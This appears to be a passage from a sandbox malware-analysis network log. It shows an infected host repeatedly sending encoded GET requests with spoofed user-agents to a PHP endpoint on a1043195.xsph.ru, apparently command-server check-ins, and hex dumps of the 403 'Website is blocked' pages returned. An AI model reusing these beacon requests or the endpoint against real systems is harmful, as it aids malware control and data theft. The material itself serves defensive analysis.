Nov 24, 2024 04:03:29.339894056 CET	1236	IN	Data Raw: 33 20 34 39 2e 32 30 36 34 20 31 31 37 2e 31 30 38 20 34 38 2e 34 34 32 36 20 31 31 36 2e 39 31 37 20 34 38 2e 34 34 32 36 43 31 30 31 2e 32 33 33 20 34 35 2e 37 36 39 32 20 38 36 2e 38 38 38 35 20 34 38 2e 34 34 32 36 20 37 31 2e 33 39 36 31 20 Data Ascii: 3 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.0075 53.9801C57.2424 54.1711 57.0512 55.1258 57.625 55.5077C63.3629 61.4272 69.1009 67.3466 75.0301 73.2661C80.1943 78.
Nov 24, 2024 04:03:29.459302902 CET	1236	IN	Data Raw: 31 31 37 20 31 32 30 2e 38 31 33 20 31 36 2e 36 39 34 32 20 31 32 31 2e 35 37 37 20 31 37 2e 30 37 36 38 20 31 32 32 2e 33 34 43 31 37 2e 34 35 39 33 20 31 32 33 2e 31 30 34 20 31 38 2e 30 33 33 31 20 31 32 33 2e 38 36 38 20 31 38 2e 36 30 36 39 Data Ascii: 117 120.813 16.6942 121.577 17.0768 122.34C17.4593 123.104 18.0331 123.868 18.6069 124.823C17.268 124.632 15.9292 124.823 14.7816 125.014C14.0165 125.205 13.4427 125.396 12.6777 125.586C12.1039 125.777 11.3388 126.159 10.9563 126.732C10.5738 1
Nov 24, 2024 04:03:29.752012968 CET	520	OUT	GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru
Nov 24, 2024 04:03:30.179399967 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	49897	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:03:36.694489956 CET	477	OUT	GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:03:38.053658962 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:03:38.053682089 CET	224	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
Nov 24, 2024 04:03:38.053755999 CET	1236	IN	Data Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
Nov 24, 2024 04:03:38.053883076 CET	1236	IN	Data Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
Nov 24, 2024 04:03:38.053901911 CET	1236	IN	Data Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
Nov 24, 2024 04:03:38.053914070 CET	1236	IN	Data Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
Nov 24, 2024 04:03:38.053925991 CET	896	IN	Data Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
Nov 24, 2024 04:03:38.053940058 CET	1236	IN	Data Raw: 20 31 36 33 2e 32 30 33 20 31 30 31 2e 31 34 34 20 31 36 31 2e 38 36 34 20 31 30 31 2e 39 30 38 43 31 36 30 2e 39 30 38 20 31 30 32 2e 34 38 31 20 31 36 31 2e 36 37 33 20 31 30 34 2e 31 39 39 20 31 36 32 2e 38 32 31 20 31 30 33 2e 36 32 37 43 31 Data Ascii: 163.203 101.144 161.864 101.908C160.908 102.481 161.673 104.199 162.821 103.627C165.69 101.908 169.133 101.526 172.193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 1
Nov 24, 2024 04:03:38.054023027 CET	1236	IN	Data Raw: 39 2e 39 32 36 20 39 37 2e 35 31 35 36 43 32 30 30 2e 31 31 37 20 39 36 2e 39 34 32 38 20 31 39 39 2e 39 32 36 20 39 36 2e 35 36 30 39 20 31 39 39 2e 33 35 32 20 39 36 2e 33 36 39 39 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 Data Ascii: 9.926 97.5156C200.117 96.9428 199.926 96.5609 199.352 96.3699Z" fill="black"/> <path d="M311.434 112.411C311.816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974 308.182 107.446 309
Nov 24, 2024 04:03:38.054035902 CET	1236	IN	Data Raw: 2e 36 39 34 31 43 31 36 33 2e 39 36 38 20 33 34 2e 31 32 31 33 20 31 36 33 2e 35 38 36 20 33 32 2e 35 39 33 37 20 31 36 32 2e 34 33 38 20 33 32 2e 39 37 35 36 43 31 35 37 2e 30 38 33 20 33 35 2e 30 37 36 20 31 35 32 2e 31 31 20 33 37 2e 39 34 30 Data Ascii: .6941C163.968 34.1213 163.586 32.5937 162.438 32.9756C157.083 35.076 152.11 37.9403 147.902 41.9502C147.902 38.7041 147.902 35.4579 147.902 32.2118C147.902 31.448 146.755 30.8751 146.181 31.448C142.547 35.8398 137.956 39.086 132.983 41.9502C13
Nov 24, 2024 04:03:38.173470974 CET	1236	IN	Data Raw: 34 31 43 33 39 2e 30 37 32 33 20 31 32 31 2e 39 35 38 20 33 39 2e 30 37 32 33 20 31 31 37 2e 37 35 38 20 33 39 2e 30 37 32 33 20 31 31 34 2e 33 32 43 33 39 2e 30 37 32 33 20 31 31 33 2e 35 35 37 20 33 38 2e 33 30 37 32 20 31 31 33 2e 31 37 35 20 Data Ascii: 41C39.0723 121.958 39.0723 117.758 39.0723 114.32C39.0723 113.557 38.3072 113.175 37.5421 113.557C34.6732 115.084 32.9518 117.948 32.7605 121.195C32.7605 121.195 32.5692 121.195 32.5692 121.004C28.9352 119.667 25.1099 119.094 21.2846 118.903C2
Nov 24, 2024 04:03:38.483716011 CET	453	OUT	GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: a1043195.xsph.ru
Nov 24, 2024 04:03:38.919651031 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.5	49913	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:03:43.569474936 CET	602	OUT	GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:03:44.881736040 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:03:44.881758928 CET	1236	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
Nov 24, 2024 04:03:44.881772041 CET	1236	IN	Data Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
Nov 24, 2024 04:03:44.881827116 CET	1236	IN	Data Raw: 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 6c 6f 6e 67 2d 6c 6f 67 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 31 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 Data Ascii: ntent .footer__long-logo{max-width:188px;max-height:32px}.wrapper .content .footer__text{color:#000;font-size:14px;line-height:138%;margin-bottom:16px;white-space:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-h
Nov 24, 2024 04:03:44.881838083 CET	1236	IN	Data Raw: 31 30 30 70 78 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e Data Ascii: 100px}}</style></head><body> <div class="wrapper"> <div class="content"> <div class="left-side"> <div class="error-block"> <p class="error-bl
Nov 24, 2024 04:03:44.881848097 CET	1236	IN	Data Raw: 32 20 37 33 2e 30 37 33 38 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 43 31 39 35 2e 33 33 36 20 36 38 2e 31 30 39 36 20 31 39 32 2e 32 Data Ascii: 2 73.0738Z" fill="black"/> <path d="M196.292 64.6725C195.336 68.1096 192.276 70.401 189.024 71.3558C184.816 72.5015 180.226 71.3558 176.209 69.8282C175.062 69.4463 174.488 71.3558 175.636 71.7377C180.226 73.2653 185.199 74.602 189.98 7
Nov 24, 2024 04:03:44.881859064 CET	1236	IN	Data Raw: 31 39 33 20 31 30 32 2e 36 37 32 43 31 37 33 2e 33 34 20 31 30 33 2e 30 35 34 20 31 37 33 2e 39 31 34 20 31 30 31 2e 31 34 34 20 31 37 32 2e 37 36 37 20 31 30 30 2e 37 36 32 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 Data Ascii: 193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 136.044 102.098 133.175 104.389C132.792 104.771 132.792 105.344 133.175 105.726C133.557 106.108 134.131 106.108 134.5
Nov 24, 2024 04:03:44.881968975 CET	1236	IN	Data Raw: 2e 38 31 36 20 31 31 31 2e 36 34 37 20 33 31 31 2e 32 34 32 20 31 31 31 2e 30 37 34 20 33 31 30 2e 36 36 39 20 31 31 30 2e 38 38 33 43 33 30 38 2e 37 35 36 20 31 31 30 2e 36 39 32 20 33 30 37 2e 30 33 35 20 31 31 30 2e 35 30 31 20 33 30 35 2e 31 Data Ascii: .816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296
Nov 24, 2024 04:03:44.881980896 CET	1236	IN	Data Raw: 31 34 37 2e 39 30 32 20 33 35 2e 34 35 37 39 20 31 34 37 2e 39 30 32 20 33 32 2e 32 31 31 38 43 31 34 37 2e 39 30 32 20 33 31 2e 34 34 38 20 31 34 36 2e 37 35 35 20 33 30 2e 38 37 35 31 20 31 34 36 2e 31 38 31 20 33 31 2e 34 34 38 43 31 34 32 2e Data Ascii: 147.902 35.4579 147.902 32.2118C147.902 31.448 146.755 30.8751 146.181 31.448C142.547 35.8398 137.956 39.086 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 4
Nov 24, 2024 04:03:44.881990910 CET	1236	IN	Data Raw: 2e 39 35 31 38 20 31 31 37 2e 39 34 38 20 33 32 2e 37 36 30 35 20 31 32 31 2e 31 39 35 43 33 32 2e 37 36 30 35 20 31 32 31 2e 31 39 35 20 33 32 2e 35 36 39 32 20 31 32 31 2e 31 39 35 20 33 32 2e 35 36 39 32 20 31 32 31 2e 30 30 34 43 32 38 2e 39 Data Ascii: .9518 117.948 32.7605 121.195C32.7605 121.195 32.5692 121.195 32.5692 121.004C28.9352 119.667 25.1099 119.094 21.2846 118.903C20.3283 118.903 19.372 118.903 18.4156 118.903C17.6506 118.903 16.8855 119.285 16.503 120.049C16.3117 120.813 16.6942
Nov 24, 2024 04:03:45.001584053 CET	1236	IN	Data Raw: 31 39 20 31 37 39 2e 30 35 33 20 31 30 32 2e 35 37 32 20 31 37 38 2e 38 36 32 43 31 30 37 2e 35 34 35 20 31 37 35 2e 36 31 35 20 31 31 31 2e 39 34 34 20 31 37 32 2e 37 35 31 20 31 31 36 2e 37 32 36 20 31 36 39 2e 31 32 33 43 31 31 36 2e 37 32 36 Data Ascii: 19 179.053 102.572 178.862C107.545 175.615 111.944 172.751 116.726 169.123C116.726 172.942 115.196 190.319 114.048 198.911C114.239 199.675 113.857 203.494 113.283 205.786C112.327 211.514 111.37 217.243 110.223 222.971C109.075 228.318 107.736 2
